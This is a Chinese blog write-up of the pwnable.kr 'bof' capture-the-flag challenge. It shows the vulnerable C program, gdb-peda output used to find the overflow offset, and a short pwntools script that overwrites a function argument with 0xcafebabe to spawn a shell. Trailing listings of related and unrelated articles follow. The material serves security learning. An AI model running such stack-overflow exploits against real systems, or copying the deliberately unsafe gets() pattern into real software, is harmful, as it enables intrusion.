这一题与前两题不同,用到了静态调试工具ida

首先题中给出了源码:

 #include <stdio.h>

 #include <string.h>

 #include <stdlib.h>

 void func(int key){

     char overflowme[];

     printf("overflow me : ");

     gets(overflowme);    // smash me!

     if(key == 0xcafebabe){

         system("/bin/sh");

     }

     else{

         printf("Nah..\n");

     }

 }

 int main(int argc, char* argv[]){

     func(0xdeadbeef);

     return ;

 }

分析源代码:思路是缓冲区溢出

我们gdb走到func函数内部分析:

gdb-peda$ n

[----------------------------------registers-----------------------------------]

EAX: 0xffffd08c (":WUV\364oUV\260VUV\001")

EBX: 0xf7fbd000 --> 0x1a9da8

ECX: 0xf7fd6000 ("overflow me : \n")

EDX: 0xf7fbe898 --> 0x0

ESI: 0x0

EDI: 0x0

EBP: 0xffffd0b8 --> 0xffffd0d8 --> 0x0

ESP: 0xffffd070 --> 0xffffd08c (":WUV\364oUV\260VUV\001")

EIP: 0x5655564f (<func+35>:	call   0xf7e77440 <gets>)

EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)

[-------------------------------------code-------------------------------------]

   0x56555644 <func+24>:	call   0xf7e77da0 <puts>

   0x56555649 <func+29>:	lea    eax,[ebp-0x2c]

   0x5655564c <func+32>:	mov    DWORD PTR [esp],eax

=> 0x5655564f <func+35>:	call   0xf7e77440 <gets>

   0x56555654 <func+40>:	cmp    DWORD PTR [ebp+0x8],0xcafebabe

   0x5655565b <func+47>:	jne    0x5655566b <func+63>

   0x5655565d <func+49>:	mov    DWORD PTR [esp],0x5655579b

   0x56555664 <func+56>:	call   0xf7e52e70 <system>

Guessed arguments:

arg[0]: 0xffffd08c (":WUV\364oUV\260VUV\001")

[------------------------------------stack-------------------------------------]

0000| 0xffffd070 --> 0xffffd08c (":WUV\364oUV\260VUV\001")

0004| 0xffffd074 --> 0x0

0008| 0xffffd078 --> 0xbf

0012| 0xffffd07c --> 0xf7ea90e6 (test   eax,eax)

0016| 0xffffd080 --> 0xffffffff

0020| 0xffffd084 --> 0xffffd0ae --> 0x56b06aa6

0024| 0xffffd088 --> 0xf7e1fc34 --> 0x2aad

0028| 0xffffd08c (":WUV\364oUV\260VUV\001")

[------------------------------------------------------------------------------]

Legend: code, data, rodata, value

0x5655564f in func ()

看这一点:

也就是说0xffffd08c就是overflowme数组开始的位置

而由

得key 的地址0xffffd0c0

所以只要输入52便可成功覆盖,便可跳转执行system("\bin\sh")

于是写exp:

 #!/usr/bin/python

 from pwn import *

 io = remote("pwnable.kr","")

 key = 0xcafebabe

 payload = "A" * 52 + p32(key)

 io.send(payload)

 io.interactive()

运行得到

pwnable.kr bof之write up的更多相关文章

  1. 【pwnable.kr】bof

    pwnable从入门到放弃,第三题. Download : http://pwnable.kr/bin/bofDownload : http://pwnable.kr/bin/bof.c Runnin ...

  2. pwnable.kr之bof

    打开题目: 先下载题目给我们的两个文件,查看文件信息: 发现没有执行的权限,所以先增加文件bof的执行权限,执行: 没发现啥,然后查看代码, #include <stdio.h> #inc ...

  3. pwnable.kr第三题bof

    Running at : nc pwnable.kr 9000 IDA查看 1 unsigned int __cdecl func(int a1) 2 { 3 char s; // [esp+1Ch] ...

  4. pwnable.kr第二天

    3.bof 这题就是简单的数组越界覆盖,直接用gdb 调试出偏移就ok from pwn import * context.log_level='debug' payload='A'*52+p32(0 ...

  5. pwnable.kr的passcode

    前段时间找到一个练习pwn的网站,pwnable.kr 这里记录其中的passcode的做题过程,给自己加深印象. 废话不多说了,看一下题目, 看到题目,就ssh连接进去,就看到三个文件如下 看了一下 ...

  6. pwnable.kr col之write up

    Daddy told me about cool MD5 hash collision today. I wanna do something like that too! ssh col@pwnab ...

  7. pwnable.kr brainfuck之write up

    I made a simple brain-fuck language emulation program written in C. The [ ] commands are not impleme ...

  8. pwnable.kr login之write up

    main函数如下: auth函数如下: 程序的流程如下: 输入Authenticate值,并base64解码,将解码的值代入md5_auth函数中 mad5_auth()生成其MD5值并与f87cd6 ...

  9. pwnable.kr详细通关秘籍(二)

    i春秋作家:W1ngs 原文来自:pwnable.kr详细通关秘籍(二) 0x00 input 首先看一下代码: 可以看到程序总共有五步,全部都满足了才可以得到flag,那我们就一步一步来看 这道题考 ...

随机推荐

  1. spring boot 入门操作(二)

    spring boot入门操作 使用FastJson解析json数据 pom dependencies里添加fastjson依赖 <dependency> <groupId>c ...

  2. 使用 Python 进行并发编程 -- asyncio (未完)

    参考地址 参考地址 参考地址 Python 2 时代, 高性能的网络编程主要是使用 Twisted, Tornado, Gevent 这三个库. 但是他们的异步代码相互之间不兼容越不能移植. asyn ...

  3. R语言统计分析技术研究——岭回归技术的原理和应用

    岭回归技术的原理和应用 作者马文敏 岭回归分析是一种专用于共线性分析的有偏估计回归方法,实质上是一种改良的最小二乘估计法,通过放弃最小二乘法的无偏性,以损失部分信息,降低精度为代价获得回归系数更为符合 ...

  4. 对js运算符“||”和“&&”的总结

    首先出个题: 如图: 假设对成长速度显示规定如下: 成长速度为5显示1个箭头: 成长速度为10显示2个箭头: 成长速度为12显示3个箭头: 成长速度为15显示4个箭头: 其他都显示都显示0各箭头. 用 ...

  5. 各开放平台API接口通用 SDK 前言

    最近两年一直在做API接口相关的工作,在平时工作中以及网上看到很多刚接触API接口调用的新人一开始会感到很不适应,包括自己刚开始做API接口调用的相关工作时,也是比较抓狂的,所有写一序列文章把之前的工 ...

  6. C++数组概述

    C++数组概述 基本概念 1. 数组是固定大小的一种复合类型 因为数组是固定大小,所以在编译期间就决定了基大小 数组的内存是连续(无论是一维数组还是多维数组) 2. 数组的特性 数组之间不允许拷贝和赋 ...

  7. Swift三元条件运算

    三元条件运算的特殊在于它是有三个操作数的运算符,它的原型是问题?答案1:答案2.它简洁地表达根据问题成立与否作出二选一的操作.如果问题成立,返回答案1的结果; 如果不成立,返回答案2的结果. 使用三元 ...

  8. Redis 基础数据结构与对象

    Redis用到的底层数据结构有:简单动态字符串.双端链表.字典.压缩列表.整数集合.跳跃表等,Redis并没有直接使用这些数据结构来实现键值对数据库,而是基于这些数据结构创建了一个对象系统,这个系统包 ...

  9. 由form表单来说说前后台数据之间的交互

    为什么从表单提交说起呢?因为大部分与后台的交互都是在form表单中实现,恰巧我入职一个月来都是在处理与后台交互的数据整合中度过,期间也发现一些小坑,出于喜欢总结,所以才想写这篇小博客. 各位童鞋,可以 ...

  10. 最新的极光推送服务器端代码(java服务器后台向手机端自定义推送消息)

    一共两个类 一个Jdpush  一个JpushClientUtil 代码如下   注解都写的很清楚 package com.sm.common.ajpush; import org.slf4j.Log ...